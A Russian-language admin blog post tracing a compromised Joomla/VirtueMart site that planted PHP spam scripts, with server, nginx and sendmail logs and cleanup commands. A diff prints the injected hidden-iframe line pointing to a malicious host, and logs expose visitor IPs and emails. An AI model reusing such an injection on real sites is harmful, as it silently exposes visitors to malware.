Сегодня обнаружил на сервере странные файлы:
root@gate:/home# find . -name 'statisticsIjod.php' ./beauty/www/images/stories/wlw/statisticsIjod.php ./beauty/www/images/stories/soap/statisticsIjod.php ./beauty/www/images/stories/fruit/statisticsIjod.php ./beauty/www/images/stories/statisticsIjod.php ./beauty/www/images/stories/food/statisticsIjod.php
создавались эти файлы раз в минуту:
root@gate:/home# ll ./beauty/www/images/stories/wlw/statisticsIjod.php -rw------- 1 nobody beauty 6987 Dec 19 21:30 ./beauty/www/images/stories/wlw/statisticsIjod.php root@gate:/home# ll ./beauty/www/images/stories/soap/statisticsIjod.php -rw------- 1 nobody beauty 6987 Dec 19 21:29 ./beauty/www/images/stories/soap/statisticsIjod.php root@gate:/home# ll ./beauty/www/images/stories/fruit/statisticsIjod.php -rw------- 1 nobody beauty 6987 Dec 19 21:28 ./beauty/www/images/stories/fruit/statisticsIjod.php root@gate:/home# ll ./beauty/www/images/stories/statisticsIjod.php -rw------- 1 nobody beauty 6987 Dec 19 21:26 ./beauty/www/images/stories/statisticsIjod.php root@gate:/home# ll ./beauty/www/images/stories/food/statisticsIjod.php -rw------- 1 nobody beauty 6987 Dec 19 21:27 ./beauty/www/images/stories/food/statisticsIjod.php
что достаточно странно.
Очевидно, что эти файлы были созданы каким-то PHP скриптом под группой beauty и юзером nobody. Судя по содержимому скрипт может быть использован для рассылки спама.
В логах Nginx-а его нет:
root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log root@gate:/var/log/nginx# grep statisticsIjod beauty.access.log.1
Зато есть файл guestbook5Su.php, который сидит рядом с ним:
80.55.28.69 - - [07/Jan/2013:13:55:07 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0" 88.235.200.86 - - [07/Jan/2013:13:55:11 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 119 "-" "Mozilla/5.0"
К этому файлу кто-то постоянно обращается с разных айпишников:
65.35.164.12 - - [07/Jan/2013:14:07:44 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 74 "-" "Mozilla/5.0" 2.134.254.42 - - [07/Jan/2013:14:07:45 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 82 "-" "Mozilla/5.0" 94.159.191.212 - - [07/Jan/2013:14:07:46 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0" 189.149.33.174 - - [07/Jan/2013:14:10:54 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0" 41.72.103.22 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0" 92.14.211.150 - - [07/Jan/2013:14:11:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 47 "-" "Mozilla/5.0" 92.14.211.150 - - [07/Jan/2013:14:11:14 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 76 "-" "Mozilla/5.0" 95.56.138.120 - - [07/Jan/2013:14:12:06 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 379 "-" "Mozilla/5.0" 93.145.93.239 - - [07/Jan/2013:14:12:58 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 383 "-" "Mozilla/5.0" 94.20.154.186 - - [07/Jan/2013:14:13:03 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 86 "-" "Mozilla/5.0" 83.50.238.68 - - [07/Jan/2013:14:13:20 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 81 "-" "Mozilla/5.0" 88.184.236.194 - - [07/Jan/2013:14:13:24 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 79 "-" "Mozilla/5.0" 41.133.201.160 - - [07/Jan/2013:14:13:28 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 77 "-" "Mozilla/5.0" 196.12.228.197 - - [07/Jan/2013:14:13:50 +0400] "POST /images/stories/guestbook5Su.php HTTP/1.1" 200 381 "-" "Mozilla/5.0"
И, судя по тому, что у меня в /var/log/mail.log, кто-то благополучно рассылает спам через sendmail:
Jan 7 13:27:29 gate sm-mta[12491]: r079RPmg012489: r079RTmg012491: DSN: Service unavailable Jan 7 13:27:29 gate sm-mta[12491]: r079RTmg012491: to=<thelma_bridges@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as 1503BC8AF9) Jan 7 13:31:53 gate sm-mta[12532]: r079VoJI012532: from=<marylou_stanley@milomag.ru>, size=525, class=0, nrcpts=1, msgid=<10abfc1-3210c-f9@milomag.ru>, proto=ESMTP, daemon=MTA-v4, relay=localhost.localdomain [127.0.0.1] Jan 7 13:31:56 gate sm-mta[12534]: r079VoJI012532: to=<potta2k6@hotmail.co>, delay=00:00:04, xdelay=00:00:03, mailer=relay, pri=120525, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=5.1.7, stat=Service unavailable Jan 7 13:31:56 gate sm-mta[12534]: r079VoJI012532: r079VuJI012534: DSN: Service unavailable Jan 7 13:31:56 gate sm-mta[12534]: r079VuJI012534: to=<marylou_stanley@milomag.ru>, delay=00:00:00, xdelay=00:00:00, mailer=relay, pri=30000, relay=smtp.spbtlg.ru. [213.158.0.51], dsn=2.0.0, stat=Sent (Ok: queued as F0BDBC7A6F)
Подозрительных файлов на сомом деле больше:
-rw-r--r-- 1 nobody beauty 6987 Dec 27 22:00 /home/beauty/www/images/stories/guestbook5Su.php -rwxr-xr-x 1 nobody beauty 861 Dec 19 23:30 /home/beauty/www/images/stories/index.php* -rw------- 1 nobody beauty 6987 Dec 19 21:26 /home/beauty/www/images/stories/statisticsIjod.php -rw-r--r-- 1 nobody beauty 113 Dec 19 10:00 /home/beauty/www/images/stories/story.php -rw-r--r-- 1 nobody beauty 11757 Dec 27 22:00 /home/beauty/www/images/stories/WMmain.php
Смотрим, что менялось за последний месяц в файловой системе:
root@gate:/home/beauty/www# find . -type f -mtime -30 ./components/com_virtuemart/shop_image/product/_________________50ce299fdc14c.png ./components/com_virtuemart/shop_image/product/_________________50d3f152c1e11.png ./components/com_virtuemart/shop_image/product/resized/_________________50ce299fd6089_90x90.png ./components/com_virtuemart/shop_image/product/resized/_________________50d3f1526661a_90x90.png ./components/com_virtuemart/shop_image/JSCookTree.js ./images/stories/wlw/statisticsIjod.php ./images/stories/wlw/index.php ./images/stories/story.php ./images/stories/WMmain.php ./images/stories/soap/statisticsIjod.php ./images/stories/soap/index.php ./images/stories/.cache_ut1x50.php ./images/stories/fruit/statisticsIjod.php ./images/stories/fruit/index.php ./images/stories/a7XJ.html ./images/stories/guestbook5Su.php ./images/stories/docs/kastorovoe-maslo.png ./images/stories/docs/maslo-kakao-nerafinirovannoe.jpg ./images/stories/statisticsIjod.php ./images/stories/food/statisticsIjod.php ./images/stories/food/index.php ./images/stories/index.php
вот как раз эти файлы и ещё какой-то JSCookTree.js, который менялся сегодня:
root@gate:/home/beauty/www# ll ./components/com_virtuemart/shop_image/JSCookTree.js -rw-rw-r-- 1 beauty beauty 21490 Jan 7 14:34 ./components/com_virtuemart/shop_image/JSCookTree.js
смотрим, что у него внутри:
root@gate:/home/beauty/www# find . -iname 'JSCookTree.js' ./components/com_virtuemart/shop_image/JSCookTree.js ./modules/mod_virtuemart/JSCookTree.js root@gate:/home/beauty/www# diff ./components/com_virtuemart/shop_image/JSCookTree.js ./modules/mod_virtuemart/JSCookTree.js 860d859 < ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://exiryji.qhigh.com/945051d6f67c98d01b760e3d07b9b.dwFS0?13" height="500" width="500"></iframe>'); \ No newline at end of file
для начала просто всё удаляем:
rm ./components/com_virtuemart/shop_image/JSCookTree.js rm ./images/stories/wlw/statisticsIjod.php ./images/stories/wlw/index.php rm ./images/stories/story.php ./images/stories/WMmain.php ./images/stories/soap/statisticsIjod.php ./images/stories/soap/index.php ./images/stories/.cache_ut1x50.php ./images/stories/fruit/statisticsIjod.php ./images/stories/fruit/index.php ./images/stories/a7XJ.html ./images/stories/guestbook5Su.php ./images/stories/statisticsIjod.php ./images/stories/food/statisticsIjod.php ./images/stories/food/index.php ./images/stories/index.php
и запоминаем, что сегодня 7 января 2013, а последний спам был послан Jan 7 14:38:44
чистим очередь (http://www.cyberciti.biz/faq/linux-unix-bsd-clear-sendmail-queue/):
# cd /var/spool/mqueue/ # ls # rm *
ссылки:
https://help.ubuntu.com/community/ClamAV http://www.linuxquestions.org/questions/linux-newbie-8/free-anti-virus-for-ubuntu-925146/ http://sourceforge.net/projects/phpantivirus/ – эта штука работает, но ничего не находит
вот ещё кое-какие странные файлы:
~$ ll www/components/com_virtuemart/shop_image/
total 92
drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 ./
drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ../
-rw-r—r— 1 beauty beauty 1530 Dec 13 2011 239ebaf5ed90010adb37827bf5909800.sess
-rw-r—r— 1 nobody beauty 1611 Jan 11 19:06 4309e0e42cbf33088ba8d725194a146c.sess
-rw-r—r— 1 beauty beauty 1530 Dec 13 2011 61914ae25b970cf5ebc88220f5f64eed.sess
-rw-r—r— 1 beauty beauty 1530 Dec 13 2011 733ffed41b5503bf962a250344f37181.sess
-rw-rw-r— 1 beauty beauty 49 Nov 12 2005 blank.gif
drwxrwxr-x 3 beauty beauty 4096 Feb 26 08:22 category/
-rw-r—r— 1 beauty beauty 1530 Sep 29 2011 dc9a7709a9cd72691a4fbe553476e0a9.sess
-rw-rw-r— 1 beauty beauty 0 Jan 4 2007 index.html
drwxrwxr-x 3 beauty beauty 49152 Apr 2 17:48 product/
drwxrwxr-x 3 beauty beauty 4096 Feb 4 06:17 ps_image/
drwxrwxr-x 2 beauty beauty 4096 Feb 6 05:51 vendor/
$ ll www/components/com_virtuemart
total 84
drwxrwxr-x 5 beauty beauty 4096 Mar 3 20:56 ./
drwxr-xr-x 22 beauty beauty 4096 Aug 23 2012 ../
-rw-r—r— 1 nobody beauty 297 Feb 1 00:28 34a44fb65e.php
-rw-r—r— 1 nobody beauty 297 Feb 4 06:58 aef2d85b.php
-rw-r—r— 1 nobody beauty 289 Dec 12 04:28 b1fdcd7.php
-rw-r—r— 1 nobody beauty 289 Feb 4 23:01 c0875d1.php
-rw-r—r— 1 beauty beauty 7678 Apr 10 2008 fetchscript.php
drwxr-xr-x 8 beauty beauty 4096 Jun 20 2011 js/
-rw-r—r— 1 beauty beauty 10165 Oct 17 2011 router.php
drwxrwxr-x 6 beauty beauty 4096 Apr 12 19:30 shop_image/
-rw-r—r— 1 beauty beauty 5470 Feb 16 2009 show_image_in_imgtag.php
drwxr-xr-x 13 beauty beauty 4096 Oct 2 2010 themes/
-rw-r—r— 1 beauty beauty 11674 Aug 15 2011 virtuemart_parser.php
-rw-r—r— 1 beauty beauty 7378 Aug 15 2011 virtuemart.php
тут странные файлы я удалил
Комментарий by admin — 13 апреля 2013 @ 10:44